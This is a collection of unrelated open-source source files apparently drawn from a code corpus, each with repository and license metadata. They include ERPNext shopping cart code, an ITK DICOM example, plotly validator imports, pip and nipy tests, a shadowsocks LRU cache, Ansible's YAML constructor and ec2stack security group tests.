'description': description,
}
| unlicense |
gangadhar-kadam/latestchurcherp | erpnext/shopping_cart/product.py | 16 | 1688 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cint, fmt_money, cstr
from erpnext.shopping_cart.cart import _get_cart_quotation
from urllib import unquote
@frappe.whitelist(allow_guest=True)
def get_product_info(item_code):
"""get product price / stock info"""
if not cint(frappe.db.get_default("shopping_cart_enabled")):
return {}
cart_quotation = _get_cart_quotation()
price_list = cstr(unquote(frappe.local.request.cookies.get("selling_price_list")))
warehouse = frappe.db.get_value("Item", item_code, "website_warehouse")
if warehouse:
in_stock = frappe.db.sql("""select actual_qty from tabBin where
item_code=%s and warehouse=%s""", (item_code, warehouse))
if in_stock:
in_stock = in_stock[0][0] > 0 and 1 or 0
else:
in_stock = -1
price = price_list and frappe.db.sql("""select price_list_rate, currency from
`tabItem Price` where item_code=%s and price_list=%s""",
(item_code, price_list), as_dict=1) or []
price = price and price[0] or None
qty = 0
if price:
price["formatted_price"] = fmt_money(price["price_list_rate"], currency=price["currency"])
price["currency"] = not cint(frappe.db.get_default("hide_currency_symbol")) \
and (frappe.db.get_value("Currency", price.currency, "symbol") or price.currency) \
or ""
if frappe.session.user != "Guest":
item = cart_quotation.get({"item_code": item_code})
if item:
qty = item[0].qty
return {
"price": price,
"stock": in_stock,
"uom": frappe.db.get_value("Item", item_code, "stock_uom"),
"qty": qty
}
| agpl-3.0 |
ajjl/ITK | Examples/IO/DicomSliceRead.py | 23 | 1679 | #==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
#
# Example on the use of ImageFileReader to reading a single slice (it will read
# DICOM or other format), rescale the intensities and save it in a different
# file format.
#
import itk
import sys
if len(sys.argv) < 3:
print('Usage: ' + sys.argv[0] + ' inputFile.dcm outputFile.png')
sys.exit(1)
#
# Reads a 2D image in with signed short (16bits/pixel) pixel type
# and save it as unsigned char (8bits/pixel) pixel type
#
InputImageType = itk.Image.SS2
OutputImageType = itk.Image.UC2
reader = itk.ImageFileReader[InputImageType].New()
writer = itk.ImageFileWriter[OutputImageType].New()
filter = itk.RescaleIntensityImageFilter[InputImageType, OutputImageType].New()
filter.SetOutputMinimum( 0 )
filter.SetOutputMaximum(255)
filter.SetInput( reader.GetOutput() )
writer.SetInput( filter.GetOutput() )
reader.SetFileName( sys.argv[1] )
writer.SetFileName( sys.argv[2] )
writer.Update()
| apache-2.0 |
plotly/plotly.py | packages/python/plotly/plotly/validators/heatmapgl/colorbar/__init__.py | 36 | 4403 | import sys
if sys.version_info < (3, 7):
from ._ypad import YpadValidator
from ._yanchor import YanchorValidator
from ._y import YValidator
from ._xpad import XpadValidator
from ._xanchor import XanchorValidator
from ._x import XValidator
from ._title import TitleValidator
from ._tickwidth import TickwidthValidator
from ._tickvalssrc import TickvalssrcValidator
from ._tickvals import TickvalsValidator
from ._ticktextsrc import TicktextsrcValidator
from ._ticktext import TicktextValidator
from ._ticksuffix import TicksuffixValidator
from ._ticks import TicksValidator
from ._tickprefix import TickprefixValidator
from ._tickmode import TickmodeValidator
from ._ticklen import TicklenValidator
from ._ticklabelposition import TicklabelpositionValidator
from ._ticklabeloverflow import TicklabeloverflowValidator
from ._tickformatstopdefaults import TickformatstopdefaultsValidator
from ._tickformatstops import TickformatstopsValidator
from ._tickformat import TickformatValidator
from ._tickfont import TickfontValidator
from ._tickcolor import TickcolorValidator
from ._tickangle import TickangleValidator
from ._tick0 import Tick0Validator
from ._thicknessmode import ThicknessmodeValidator
from ._thickness import ThicknessValidator
from ._showticksuffix import ShowticksuffixValidator
from ._showtickprefix import ShowtickprefixValidator
from ._showticklabels import ShowticklabelsValidator
from ._showexponent import ShowexponentValidator
from ._separatethousands import SeparatethousandsValidator
from ._outlinewidth import OutlinewidthValidator
from ._outlinecolor import OutlinecolorValidator
from ._nticks import NticksValidator
from ._minexponent import MinexponentValidator
from ._lenmode import LenmodeValidator
from ._len import LenValidator
from ._exponentformat import ExponentformatValidator
from ._dtick import DtickValidator
from ._borderwidth import BorderwidthValidator
from ._bordercolor import BordercolorValidator
from ._bgcolor import BgcolorValidator
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__,
[],
[
"._ypad.YpadValidator",
"._yanchor.YanchorValidator",
"._y.YValidator",
"._xpad.XpadValidator",
"._xanchor.XanchorValidator",
"._x.XValidator",
"._title.TitleValidator",
"._tickwidth.TickwidthValidator",
"._tickvalssrc.TickvalssrcValidator",
"._tickvals.TickvalsValidator",
"._ticktextsrc.TicktextsrcValidator",
"._ticktext.TicktextValidator",
"._ticksuffix.TicksuffixValidator",
"._ticks.TicksValidator",
"._tickprefix.TickprefixValidator",
"._tickmode.TickmodeValidator",
"._ticklen.TicklenValidator",
"._ticklabelposition.TicklabelpositionValidator",
"._ticklabeloverflow.TicklabeloverflowValidator",
"._tickformatstopdefaults.TickformatstopdefaultsValidator",
"._tickformatstops.TickformatstopsValidator",
"._tickformat.TickformatValidator",
"._tickfont.TickfontValidator",
"._tickcolor.TickcolorValidator",
"._tickangle.TickangleValidator",
"._tick0.Tick0Validator",
"._thicknessmode.ThicknessmodeValidator",
"._thickness.ThicknessValidator",
"._showticksuffix.ShowticksuffixValidator",
"._showtickprefix.ShowtickprefixValidator",
"._showticklabels.ShowticklabelsValidator",
"._showexponent.ShowexponentValidator",
"._separatethousands.SeparatethousandsValidator",
"._outlinewidth.OutlinewidthValidator",
"._outlinecolor.OutlinecolorValidator",
"._nticks.NticksValidator",
"._minexponent.MinexponentValidator",
"._lenmode.LenmodeValidator",
"._len.LenValidator",
"._exponentformat.ExponentformatValidator",
"._dtick.DtickValidator",
"._borderwidth.BorderwidthValidator",
"._bordercolor.BordercolorValidator",
"._bgcolor.BgcolorValidator",
],
)
| mit |
alexis-roche/nipy | nipy/modalities/fmri/tests/test_fmri.py | 3 | 2172 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from __future__ import with_statement
from __future__ import absolute_import
import gc
import warnings
import numpy as np
from nipy.modalities.fmri.api import axis0_generator, FmriImageList
from nipy.core.api import parcels, Image, AffineTransform as AfT
from nipy.io.api import load_image, save_image
from nose.tools import assert_equal, assert_true
from nibabel.tmpdirs import InTemporaryDirectory
from nipy.testing import funcfile
def setup():
# Suppress warnings during tests to reduce noise
warnings.simplefilter("ignore")
def teardown():
# Clear list of warning filters
warnings.resetwarnings()
def test_write():
fname = 'myfile.nii'
img = load_image(funcfile)
with InTemporaryDirectory():
save_image(img, fname)
test = FmriImageList.from_image(load_image(fname))
assert_equal(test[0].affine.shape, (4,4))
assert_equal(img[0].affine.shape, (5,4))
# Check the affine...
A = np.identity(4)
A[:3,:3] = img[:,:,:,0].affine[:3,:3]
A[:3,-1] = img[:,:,:,0].affine[:3,-1]
assert_true(np.allclose(test[0].affine, A))
del test
def test_iter():
img = load_image(funcfile)
img_shape = img.shape
exp_shape = (img_shape[0],) + img_shape[2:]
j = 0
for i, d in axis0_generator(img.get_data()):
j += 1
assert_equal(d.shape, exp_shape)
del(i); gc.collect()
assert_equal(j, img_shape[1])
def test_subcoordmap():
img = load_image(funcfile)
subcoordmap = img[3].coordmap
xform = img.affine[:,1:]
assert_true(np.allclose(subcoordmap.affine[1:], xform[1:]))
assert_true(np.allclose(subcoordmap.affine[0], [0,0,0,img.coordmap([3,0,0,0])[0]]))
def test_labels1():
img = load_image(funcfile)
data = img.get_data()
parcelmap = Image(img[0].get_data(), AfT('kji', 'zyx', np.eye(4)))
parcelmap = (parcelmap.get_data() * 100).astype(np.int32)
v = 0
for i, d in axis0_generator(data, parcels(parcelmap)):
v += d.shape[1]
assert_equal(v, parcelmap.size)
| bsd-3-clause |
ericholscher/pip-1 | tests/test_finder.py | 1 | 4262 | from pkg_resources import parse_version
from pip.backwardcompat import urllib
from pip.req import InstallRequirement
from pip.index import PackageFinder
from pip.exceptions import BestVersionAlreadyInstalled
from tests.path import Path
from tests.test_pip import here
from nose.tools import assert_raises
from mock import Mock
find_links = 'file://' + urllib.quote(str(Path(here).abspath/'packages').replace('\\', '/'))
find_links2 = 'file://' + urllib.quote(str(Path(here).abspath/'packages2').replace('\\', '/'))
def test_no_mpkg():
"""Finder skips zipfiles with "macosx10" in the name."""
finder = PackageFinder([find_links], [])
req = InstallRequirement.from_line("pkgwithmpkg")
found = finder.find_requirement(req, False)
assert found.url.endswith("pkgwithmpkg-1.0.tar.gz"), found
def test_no_partial_name_match():
"""Finder requires the full project name to match, not just beginning."""
finder = PackageFinder([find_links], [])
req = InstallRequirement.from_line("gmpy")
found = finder.find_requirement(req, False)
assert found.url.endswith("gmpy-1.15.tar.gz"), found
def test_duplicates_sort_ok():
"""Finder successfully finds one of a set of duplicates in different
locations"""
finder = PackageFinder([find_links, find_links2], [])
req = InstallRequirement.from_line("duplicate")
found = finder.find_requirement(req, False)
assert found.url.endswith("duplicate-1.0.tar.gz"), found
def test_finder_detects_latest_find_links():
"""Test PackageFinder detects latest using find-links"""
req = InstallRequirement.from_line('simple', None)
finder = PackageFinder([find_links], [])
link = finder.find_requirement(req, False)
assert link.url.endswith("simple-3.0.tar.gz")
def test_finder_detects_latest_already_satisfied_find_links():
    """Test PackageFinder detects latest already satisified using find-links"""
    req = InstallRequirement.from_line('simple', None)
    #the latest simple in local pkgs is 3.0
    latest_version = "3.0"
    # Simulate that the newest release is already installed.
    satisfied_by = Mock(
        location = "/path",
        parsed_version = parse_version(latest_version),
        version = latest_version
        )
    req.satisfied_by = satisfied_by
    finder = PackageFinder([find_links], [])
    # With upgrade=True the finder must report nothing newer is available.
    assert_raises(BestVersionAlreadyInstalled, finder.find_requirement, req, True)
def test_finder_detects_latest_already_satisfied_pypi_links():
    """Test PackageFinder detects latest already satisified using pypi links"""
    req = InstallRequirement.from_line('initools', None)
    #the latest initools on pypi is 0.3.1
    latest_version = "0.3.1"
    # Simulate that the newest release is already installed.
    satisfied_by = Mock(
        location = "/path",
        parsed_version = parse_version(latest_version),
        version = latest_version
        )
    req.satisfied_by = satisfied_by
    # NOTE(review): this test hits the live PyPI index over the network.
    finder = PackageFinder([], ["http://pypi.python.org/simple"])
    assert_raises(BestVersionAlreadyInstalled, finder.find_requirement, req, True)
def test_finder_priority_file_over_page():
    """Test PackageFinder prefers file links over equivalent page links"""
    req = InstallRequirement.from_line('gmpy==1.15', None)
    finder = PackageFinder([find_links], ["http://pypi.python.org/simple"])
    link = finder.find_requirement(req, False)
    # The local file:// link must beat the equivalent index-page link.
    assert link.url.startswith("file://")
def test_finder_priority_page_over_deplink():
    """Test PackageFinder prefers page links over equivalent dependency links"""
    req = InstallRequirement.from_line('gmpy==1.15', None)
    finder = PackageFinder([], ["http://pypi.python.org/simple"])
    finder.add_dependency_links(['http://c.pypi.python.org/simple/gmpy/'])
    link = finder.find_requirement(req, False)
    # The canonical index link must beat the dependency-links mirror.
    assert link.url.startswith("http://pypi")
def test_finder_priority_nonegg_over_eggfragments():
    """Test PackageFinder prefers non-egg links over "#egg=" links"""
    req = InstallRequirement.from_line('bar==1.0', None)
    links = ['http://foo/bar.py#egg=bar-1.0', 'http://foo/bar-1.0.tar.gz']
    finder = PackageFinder(links, [])
    link = finder.find_requirement(req, False)
    assert link.url.endswith('tar.gz')
    # The preference must hold regardless of the order the links are listed.
    links.reverse()
    finder = PackageFinder(links, [])
    link = finder.find_requirement(req, False)
    assert link.url.endswith('tar.gz')
| mit |
hzy87email/shadowsocks | shadowsocks/lru_cache.py | 983 | 4290 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import collections
import logging
import time
# this LRUCache is optimized for concurrency, not QPS
# n: concurrency, keys stored in the cache
# m: visits not timed out, proportional to QPS * timeout
# get & set is O(1), not O(n). thus we can support very large n
# TODO: if timeout or QPS is too large, then this cache is not very efficient,
# as sweep() causes long pause
class LRUCache(collections.MutableMapping):
    """This class is not thread safe"""

    def __init__(self, timeout=60, close_callback=None, *args, **kwargs):
        # timeout: seconds of inactivity before an entry becomes sweepable.
        # close_callback: optional hook invoked with each expired value
        # (at most once per distinct value per sweep) before it is dropped.
        self.timeout = timeout
        self.close_callback = close_callback
        self._store = {}  # key -> value
        # visit timestamp -> list of keys visited at that timestamp
        self._time_to_keys = collections.defaultdict(list)
        self._keys_to_last_time = {}  # key -> most recent visit timestamp
        self._last_visits = collections.deque()  # visit timestamps, oldest first
        self._closed_values = set()
        self.update(dict(*args, **kwargs))  # use the free update to set keys

    def __getitem__(self, key):
        # O(1)
        # Reading counts as a visit: refresh the key's timestamp bookkeeping
        # so the entry's idle clock restarts.
        t = time.time()
        self._keys_to_last_time[key] = t
        self._time_to_keys[t].append(key)
        self._last_visits.append(t)
        return self._store[key]

    def __setitem__(self, key, value):
        # O(1)
        # Writing also counts as a visit.
        t = time.time()
        self._keys_to_last_time[key] = t
        self._store[key] = value
        self._time_to_keys[t].append(key)
        self._last_visits.append(t)

    def __delitem__(self, key):
        # O(1)
        # Stale references left behind in _time_to_keys/_last_visits are
        # tolerated: sweep() re-checks membership before expiring anything.
        del self._store[key]
        del self._keys_to_last_time[key]

    def __iter__(self):
        return iter(self._store)

    def __len__(self):
        return len(self._store)

    def sweep(self):
        # O(m): walk visit timestamps oldest-first, expiring idle entries.
        now = time.time()
        c = 0
        while len(self._last_visits) > 0:
            least = self._last_visits[0]
            if now - least <= self.timeout:
                # Oldest remaining visit is still fresh; nothing more to do.
                break
            if self.close_callback is not None:
                # First pass: fire the callback only for keys that truly
                # expired (a key may have been re-visited since `least`).
                for key in self._time_to_keys[least]:
                    if key in self._store:
                        if now - self._keys_to_last_time[key] > self.timeout:
                            value = self._store[key]
                            if value not in self._closed_values:
                                # Dedupe: a value stored under several keys
                                # is closed only once per sweep.
                                self.close_callback(value)
                                self._closed_values.add(value)
            # Second pass: pop the visit records and drop expired entries.
            for key in self._time_to_keys[least]:
                self._last_visits.popleft()
                if key in self._store:
                    if now - self._keys_to_last_time[key] > self.timeout:
                        del self._store[key]
                        del self._keys_to_last_time[key]
                        c += 1
            del self._time_to_keys[least]
        if c:
            self._closed_values.clear()
            logging.debug('%d keys swept' % c)
def test():
    """Timing-based self-test for LRUCache expiry and the close callback."""
    # Entries idle longer than `timeout` disappear after a sweep.
    c = LRUCache(timeout=0.3)
    c['a'] = 1
    assert c['a'] == 1
    time.sleep(0.5)
    c.sweep()
    assert 'a' not in c

    c['a'] = 2
    c['b'] = 3
    time.sleep(0.2)
    c.sweep()
    # Still within the timeout: both survive.
    assert c['a'] == 2
    assert c['b'] == 3
    time.sleep(0.2)
    c.sweep()
    # Visiting 'b' refreshes it; 'a' keeps aging.
    c['b']
    time.sleep(0.2)
    c.sweep()
    assert 'a' not in c
    assert c['b'] == 3
    time.sleep(0.5)
    c.sweep()
    assert 'a' not in c
    assert 'b' not in c

    # The close callback must fire exactly once for an expired value.
    global close_cb_called
    close_cb_called = False

    def close_cb(t):
        global close_cb_called
        assert not close_cb_called
        close_cb_called = True

    c = LRUCache(timeout=0.1, close_callback=close_cb)
    c['s'] = 1
    c['s']
    time.sleep(0.1)
    c['s']
    time.sleep(0.3)
    c.sweep()


if __name__ == '__main__':
    test()
| apache-2.0 |
shanemcd/ansible | lib/ansible/parsing/yaml/constructor.py | 96 | 6286 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from yaml.constructor import SafeConstructor, ConstructorError
from yaml.nodes import MappingNode
from ansible.module_utils._text import to_bytes
from ansible.parsing.yaml.objects import AnsibleMapping, AnsibleSequence, AnsibleUnicode
from ansible.parsing.yaml.objects import AnsibleVaultEncryptedUnicode
from ansible.utils.unsafe_proxy import wrap_var
from ansible.parsing.vault import VaultLib
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class AnsibleConstructor(SafeConstructor):
    """YAML constructor producing Ansible's position-tracking types
    (AnsibleMapping, AnsibleSequence, AnsibleUnicode) and handling the
    custom !unsafe and !vault tags."""

    def __init__(self, file_name=None, vault_secrets=None):
        # file_name overrides the datasource reported in position info
        # (used when the YAML text was pre-read from a file).
        self._ansible_file_name = file_name
        super(AnsibleConstructor, self).__init__()
        self._vaults = {}
        self.vault_secrets = vault_secrets or []
        self._vaults['default'] = VaultLib(secrets=self.vault_secrets)

    def construct_yaml_map(self, node):
        # Two-step construction (yield the empty mapping first, then fill
        # it in) follows PyYAML's generator protocol so recursive/anchored
        # structures resolve correctly.
        data = AnsibleMapping()
        yield data
        value = self.construct_mapping(node)
        data.update(value)
        data.ansible_pos = self._node_position_info(node)

    def construct_mapping(self, node, deep=False):
        # Most of this is from yaml.constructor.SafeConstructor. We replicate
        # it here so that we can warn users when they have duplicate dict keys
        # (pyyaml silently allows overwriting keys)
        if not isinstance(node, MappingNode):
            raise ConstructorError(None, None,
                                   "expected a mapping node, but found %s" % node.id,
                                   node.start_mark)
        self.flatten_mapping(node)
        mapping = AnsibleMapping()

        # Add our extra information to the returned value
        mapping.ansible_pos = self._node_position_info(node)

        for key_node, value_node in node.value:
            key = self.construct_object(key_node, deep=deep)
            try:
                hash(key)
            except TypeError as exc:
                raise ConstructorError("while constructing a mapping", node.start_mark,
                                       "found unacceptable key (%s)" % exc, key_node.start_mark)

            if key in mapping:
                # NOTE: the position reported is the mapping's start, not
                # the duplicate key's own line/column.
                display.warning(u'While constructing a mapping from {1}, line {2}, column {3}, found a duplicate dict key ({0}).'
                                u' Using last defined value only.'.format(key, *mapping.ansible_pos))

            value = self.construct_object(value_node, deep=deep)
            mapping[key] = value

        return mapping

    def construct_yaml_str(self, node, unsafe=False):
        # Override the default string handling function
        # to always return unicode objects
        value = self.construct_scalar(node)
        ret = AnsibleUnicode(value)

        ret.ansible_pos = self._node_position_info(node)

        if unsafe:
            # Mark the value so it is treated as untrusted downstream.
            ret = wrap_var(ret)

        return ret

    def construct_vault_encrypted_unicode(self, node):
        """Build an AnsibleVaultEncryptedUnicode from a !vault scalar."""
        value = self.construct_scalar(node)
        b_ciphertext_data = to_bytes(value)
        # could pass in a key id here to choose the vault to associate with
        # TODO/FIXME: plugin vault selector
        vault = self._vaults['default']
        if vault.secrets is None:
            raise ConstructorError(context=None, context_mark=None,
                                   problem="found !vault but no vault password provided",
                                   problem_mark=node.start_mark,
                                   note=None)
        ret = AnsibleVaultEncryptedUnicode(b_ciphertext_data)
        ret.vault = vault
        return ret

    def construct_yaml_seq(self, node):
        # Same two-step (yield, then fill) protocol as construct_yaml_map.
        data = AnsibleSequence()
        yield data
        data.extend(self.construct_sequence(node))
        data.ansible_pos = self._node_position_info(node)

    def construct_yaml_unsafe(self, node):
        return self.construct_yaml_str(node, unsafe=True)

    def _node_position_info(self, node):
        """Return (datasource, line, column) for *node*, 1-indexed."""
        # the line number where the previous token has ended (plus empty lines)
        # Add one so that the first line is line 1 rather than line 0
        column = node.start_mark.column + 1
        line = node.start_mark.line + 1

        # in some cases, we may have pre-read the data and then
        # passed it to the load() call for YAML, in which case we
        # want to override the default datasource (which would be
        # '<string>') to the actual filename we read in
        datasource = self._ansible_file_name or node.start_mark.name

        return (datasource, line, column)
# Wire the constructors into AnsibleConstructor: standard YAML tags map to
# Ansible's position-tracking container/string types, and the custom
# !unsafe / !vault / !vault-encrypted tags get their special handling.
AnsibleConstructor.add_constructor(
    u'tag:yaml.org,2002:map',
    AnsibleConstructor.construct_yaml_map)

AnsibleConstructor.add_constructor(
    u'tag:yaml.org,2002:python/dict',
    AnsibleConstructor.construct_yaml_map)

AnsibleConstructor.add_constructor(
    u'tag:yaml.org,2002:str',
    AnsibleConstructor.construct_yaml_str)

AnsibleConstructor.add_constructor(
    u'tag:yaml.org,2002:python/unicode',
    AnsibleConstructor.construct_yaml_str)

AnsibleConstructor.add_constructor(
    u'tag:yaml.org,2002:seq',
    AnsibleConstructor.construct_yaml_seq)

AnsibleConstructor.add_constructor(
    u'!unsafe',
    AnsibleConstructor.construct_yaml_unsafe)

AnsibleConstructor.add_constructor(
    u'!vault',
    AnsibleConstructor.construct_vault_encrypted_unicode)

AnsibleConstructor.add_constructor(u'!vault-encrypted', AnsibleConstructor.construct_vault_encrypted_unicode)
| gpl-3.0 |
apache/cloudstack-ec2stack | tests/security_group_tests.py | 3 | 18822 | #!/usr/bin/env python
# encoding: utf-8
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
import mock
from ec2stack.helpers import read_file, generate_signature
from . import Ec2StackAppTestCase
class SecurityGroupTestCase(Ec2StackAppTestCase):
    """Tests for the EC2-compatible security group actions.

    Every test follows the same recipe: build a signed EC2-style request,
    stub the CloudStack backend HTTP call with a canned JSON fixture, POST
    the request, and inspect the translated EC2 response.  The shared
    plumbing lives in the private helpers below; each test only states its
    request parameters, fixture, and expected outcome.
    """

    # Directory holding the canned CloudStack JSON responses.
    FIXTURE_DIR = 'tests/data/'

    # ------------------------------------------------------------------
    # Helpers
    # ------------------------------------------------------------------

    def _example(self, **fields):
        """Return the base example request data updated with *fields*."""
        data = self.get_example_data()
        data.update(fields)
        return data

    def _signed_post(self, data):
        """Sign *data* the way an EC2 client would, then POST it."""
        data['Signature'] = generate_signature(data, 'POST', 'localhost', '/')
        return self.post('/', data=data)

    def _stub_get(self, fixture, status_code=200):
        """Build a mock for requests.get serving *fixture* with *status_code*."""
        get = mock.Mock()
        get.return_value.text = read_file(self.FIXTURE_DIR + fixture)
        get.return_value.status_code = status_code
        return get

    def _request(self, data, fixture, status_code=200):
        """POST *data* with the CloudStack backend stubbed by *fixture*."""
        with mock.patch('requests.get', self._stub_get(fixture, status_code)):
            return self._signed_post(data)

    def _revoke_request(self, data, fixture):
        """POST a revoke request; additionally stubs the rule lookup helper."""
        describe_item_request = mock.Mock()
        describe_item_request.return_value = json.loads(read_file(
            self.FIXTURE_DIR + 'revoke_security_group_search.json'
        ))
        with mock.patch('requests.get', self._stub_get(fixture)):
            with mock.patch(
                'ec2stack.providers.cloudstack.describe_item_request',
                describe_item_request
            ):
                return self._signed_post(data)

    # ------------------------------------------------------------------
    # Authorize ingress/egress
    # ------------------------------------------------------------------

    def test_authorize_security_group_ingress_by_name(self):
        data = self._example(
            Action='AuthorizeSecurityGroupIngress', GroupName='test',
            FromPort='1000', ToPort='1024', IpProtocol='tcp',
            CidrIp='0.0.0.0/0')
        response = self._request(
            data, 'valid_authorize_security_group_ingress.json')
        self.assert_ok(response)
        assert 'AuthorizeSecurityGroupIngressResponse' in response.data

    def test_authorize_security_group_ingress_by_id(self):
        data = self._example(
            Action='AuthorizeSecurityGroupIngress',
            GroupId='7ae5b92f-3a0d-4977-bc33-f1aaecee5776',
            FromPort='-1', ToPort='-1', IpProtocol='icmp')
        response = self._request(
            data, 'valid_authorize_security_group_ingress.json')
        self.assert_ok(response)
        assert 'AuthorizeSecurityGroupIngressResponse' in response.data

    def test_authorize_security_group_egress_by_name(self):
        data = self._example(
            Action='AuthorizeSecurityGroupEgress', GroupName='test',
            FromPort='1000', ToPort='1024', IpProtocol='tcp',
            CidrIp='0.0.0.0/0')
        response = self._request(
            data, 'valid_authorize_security_group_egress.json')
        self.assert_ok(response)
        assert 'AuthorizeSecurityGroupEgressResponse' in response.data

    def test_authorize_security_group_egress_by_id(self):
        data = self._example(
            Action='AuthorizeSecurityGroupEgress',
            GroupId='7ae5b92f-3a0d-4977-bc33-f1aaecee5776',
            FromPort='-1', ToPort='-1', IpProtocol='icmp')
        response = self._request(
            data, 'valid_authorize_security_group_egress.json')
        self.assert_ok(response)
        assert 'AuthorizeSecurityGroupEgressResponse' in response.data

    def test_duplicate_authorize_security_group(self):
        data = self._example(
            Action='AuthorizeSecurityGroupEgress', GroupName='test',
            FromPort='1000', ToPort='1024', IpProtocol='tcp',
            CidrIp='0.0.0.0/0')
        response = self._request(
            data, 'invalid_authorize_security_group_egress_duplicate.json')
        self.assert_bad_request(response)
        assert 'InvalidPermission.Duplicate' in response.data

    def test_invalid_rule_authorize_security_group(self):
        # ToPort 99999 is outside the valid port range.
        data = self._example(
            Action='AuthorizeSecurityGroupEgress', GroupName='test',
            FromPort='1000', ToPort='99999', IpProtocol='tcp',
            CidrIp='0.0.0.0/24')
        response = self._request(
            data, 'invalid_authorize_security_group_egress.json')
        self.assert_bad_request(response)
        assert 'InvalidRequest' in response.data

    def test_invalid_security_group_authorize_security_group(self):
        data = self._example(
            Action='AuthorizeSecurityGroupEgress',
            GroupName='invalid-security-group',
            FromPort='1000', ToPort='1024', IpProtocol='tcp',
            CidrIp='0.0.0.0/24')
        # CloudStack answers 431 when the named group does not exist.
        response = self._request(
            data, 'invalid_security_group_authorize_security_group.json',
            status_code=431)
        self.assert_bad_request(response)
        assert 'InvalidGroup.NotFound' in response.data

    # ------------------------------------------------------------------
    # Create / delete
    # ------------------------------------------------------------------

    def test_create_security_group(self):
        data = self._example(
            Action='CreateSecurityGroup', GroupName='securitygroupname',
            GroupDescription='security group description')
        response = self._request(data, 'valid_create_security_group.json')
        self.assert_ok(response)
        assert 'CreateSecurityGroupResponse' in response.data

    def test_create_duplicate_security_group(self):
        data = self._example(
            Action='CreateSecurityGroup', GroupName='securitygroupname',
            GroupDescription='security group description')
        response = self._request(
            data, 'invalid_create_security_group_duplicate.json',
            status_code=431)
        self.assert_bad_request(response)
        assert 'InvalidGroup.Duplicate' in response.data

    def test_delete_security_group_by_name(self):
        data = self._example(
            Action='DeleteSecurityGroup', GroupName='securitygroupname')
        response = self._request(data, 'valid_delete_security_group.json')
        self.assert_ok(response)
        assert 'DeleteSecurityGroupResponse' in response.data

    def test_delete_security_group_by_id(self):
        data = self._example(
            Action='DeleteSecurityGroup', GroupId='securitygroupname')
        response = self._request(data, 'valid_delete_security_group.json')
        self.assert_ok(response)
        assert 'DeleteSecurityGroupResponse' in response.data

    def test_invalid_delete_security_group(self):
        # Neither GroupName nor GroupId supplied: the request is rejected
        # before any backend call, so no requests.get stub is needed.
        data = self._example(Action='DeleteSecurityGroup')
        response = self._signed_post(data)
        self.assert_bad_request(response)
        assert 'MissingParameter' in response.data

    # ------------------------------------------------------------------
    # Describe
    # ------------------------------------------------------------------

    def test_describe_security_groups(self):
        data = self._example(Action='DescribeSecurityGroups')
        response = self._request(data, 'valid_describe_security_groups.json')
        self.assert_ok(response)
        assert 'DescribeSecurityGroupsResponse' in response.data

    def test_describe_security_group_by_id(self):
        data = self._example(
            Action='DescribeSecurityGroups',
            GroupId='3b637c2e-b0a8-40ae-a7a3-2bef2871d36d')
        response = self._request(data, 'valid_describe_security_groups.json')
        self.assert_ok(response)
        assert 'DescribeSecurityGroupsResponse' in response.data
        assert '3b637c2e-b0a8-40ae-a7a3-2bef2871d36d' in response.data

    def test_invalid_describe_security_group_by_id(self):
        data = self._example(
            Action='DescribeSecurityGroups',
            GroupId='invalid-security-group-id')
        response = self._request(data, 'valid_describe_security_groups.json')
        self.assert_bad_request(response)
        assert 'InvalidGroup.NotFound' in response.data

    def test_empty_response_describe_security_group_by_id(self):
        data = self._example(
            Action='DescribeSecurityGroups',
            GroupId='invalid-security-group-id')
        response = self._request(data, 'empty_describe_security_groups.json')
        self.assert_bad_request(response)
        assert 'InvalidGroup.NotFound' in response.data

    def test_describe_security_group_by_name(self):
        data = self._example(
            Action='DescribeSecurityGroups', GroupName='test')
        response = self._request(data, 'valid_describe_security_groups.json')
        self.assert_ok(response)
        assert 'DescribeSecurityGroupsResponse' in response.data
        assert 'test' in response.data

    def test_invalid_describe_security_group_by_name(self):
        data = self._example(
            Action='DescribeSecurityGroups', GroupName='invalid-name')
        response = self._request(data, 'valid_describe_security_groups.json')
        self.assert_bad_request(response)
        assert 'InvalidGroup.NotFound' in response.data

    def test_empty_response_describe_security_group_by_name(self):
        data = self._example(
